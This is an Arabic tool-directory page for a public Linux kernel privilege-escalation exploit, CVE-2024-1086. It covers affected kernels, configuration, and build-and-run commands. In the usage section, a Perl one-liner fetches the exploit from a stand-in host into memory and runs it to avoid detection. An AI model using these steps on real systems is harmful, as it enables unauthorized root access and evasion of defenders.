Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-1086 — استغلال إثبات مفهوم عالمي لتصعيد الامتيازات المحلية لـ CVE-2024-1086، يعمل على معظم نوى لينكس بين v5.14 و v6.6، بما في ذلك Debian و Ubuntu و KernelCTF. نسبة النجاح هي 99.4% في صور KernelCTF. | Kitploit
أدوات/GitHubGitHub/notselwyn/cve-2024-1086
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالأوراق والأبحاثالتعلم والتعليماستغلال الملفات الثنائية
GitHubnotselwyn/cve-2024-1086

CVE-2024-1086

استغلال إثبات مفهوم عالمي لتصعيد الامتيازات المحلية لـ CVE-2024-1086، يعمل على معظم نوى لينكس بين v5.14 و v6.6، بما في ذلك Debian و Ubuntu و KernelCTF. نسبة النجاح هي 99.4% في صور KernelCTF.

عرض المستودع
2.5k330منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2024-1086

إثبات المفهوم الشامل لرفع الامتيازات المحلية لثغرة CVE-2024-1086، يعمل على معظم نوى لينكس بين v5.14 و v6.6، بما في ذلك دبيان وأوبونتو وKernelCTF. نسبة النجاح 99.4% في صور KernelCTF.

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

تدوينة / شرح مفصل

يمكن العثور على شرح كامل للاستغلال - بما في ذلك معلومات أساسية ورسوم بيانية مفيدة - في تدوينة Flipping Pages.

الإصدارات المتأثرة

يؤثر الاستغلال على الإصدارات من (بما في ذلك) v5.14 إلى (بما في ذلك) v6.6، باستثناء الفروع المصححة v5.15.149> و v6.1.76> و v6.6.15>. تم إصدار التصحيح لهذه الإصدارات في فبراير 2024. الثغرة الأساسية تؤثر على جميع الإصدارات (باستثناء الفروع المستقرة المصححة) من v3.15 إلى v6.8-rc1.

ملاحظات:

  • لا يعمل الاستغلال على نوى v6.4> مع kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (بما في ذلك أوبونتو v6.5)
  • يتطلب الاستغلال مساحات أسماء المستخدمين (kconfig CONFIG_USER_NS=y)، وأن تكون مساحات أسماء المستخدمين غير مميزة (أمر sh sysctl kernel.unprivileged_userns_clone = 1)، وأن يكون nf_tables مفعلاً (kconfig CONFIG_NF_TABLES=y). بشكل افتراضي، كل هذه الخيارات مفعلة على دبيان وأوبونتو وKernelCTF. لم يتم اختبار التوزيعات الأخرى، ولكنها قد تعمل أيضًا. بالإضافة إلى ذلك، تم اختبار الاستغلال فقط على x64/amd64.
  • قد يكون الاستغلال غير مستقر للغاية على الأنظمة ذات النشاط الشبكي العالي
    • الأنظمة المزودة بمحول WiFi، عند وجود شبكات WiFi عالية الاستخدام حولها، ستكون غير مستقرة جدًا.
    • على أجهزة الاختبار، يُرجى إيقاف تشغيل محولات WiFi من خلال BIOS.
  • انهيار النواة (تعطل النظام) بعد تشغيل الاستغلال هو تأثير جانبي لم يتم إصلاحه عمدًا لمنع الاستخدام الضار للاستغلال (أي ينبغي أن تكون محاولات الاستغلال أكثر وضوحًا، وغير عملية في العمليات الواقعية). ومع ذلك، لا يزال يسمح بإثبات مفهوم عملي في بيئات المختبرات، حيث أن شل الجذور يعمل، ويمكن الاستمرار من خلال القرص.

الاستخدام

التهيئة

يجب أن تعمل القيم الافتراضية مباشرة على دبيان وأوبونتو وKernelCTF مع شل محلي. على الإعدادات/التوزيعات غير المختبرة، يُرجى التأكد من تطابق قيم kconfig مع النواة المستهدفة. يمكن تحديدها في src/config.h. إذا كنت تشغل الاستغلال على جهاز بذاكرة فعلية أكبر من 32 غيغابايت، فتأكد من زيادة CONFIG_PHYS_MEM. إذا كنت تشغل الاستغلال عبر SSH (إلى جهاز الاختبار) أو شل عكسي، قد ترغب في ضبط CONFIG_REDIRECT_LOG إلى 1 لتجنب النشاط الشبكي غير الضروري.

البناء

إذا كان هذا غير عملي لك، فهناك ثنائي x64 مجمع مع التهيئة الافتراضية.

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

الملف الثنائي: CVE-2024-1086/exploit

التشغيل

تشغيل الاستغلال بسيط أيضًا:

root@kitploit:~
./exploit

كما يدعم التنفيذ بدون ملفات، في حالات اختبار الاختراق حيث يجب تجنب الاكتشافات. ومع ذلك، يجب تثبيت Perl على الهدف:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

إخلاء مسؤولية

البرامج والنصوص ("البرامج") في هذا الدليل/المجلد/المستودع البرمجي ("المستودع") منشورة ومطورة وموزعة للأغراض التعليمية/البحثية فقط. أنا ("المُنشِئ") لا أقر أي استخدام ضار أو غير قانوني للبرامج في هذا المستودع، حيث أن القصد هو مشاركة البحث وليس القيام بأنشطة غير قانونية به. أنا لست مسؤولاً قانونياً عن أي شيء تفعله بالبرامج في هذا المستودع.

تنزيل الأداة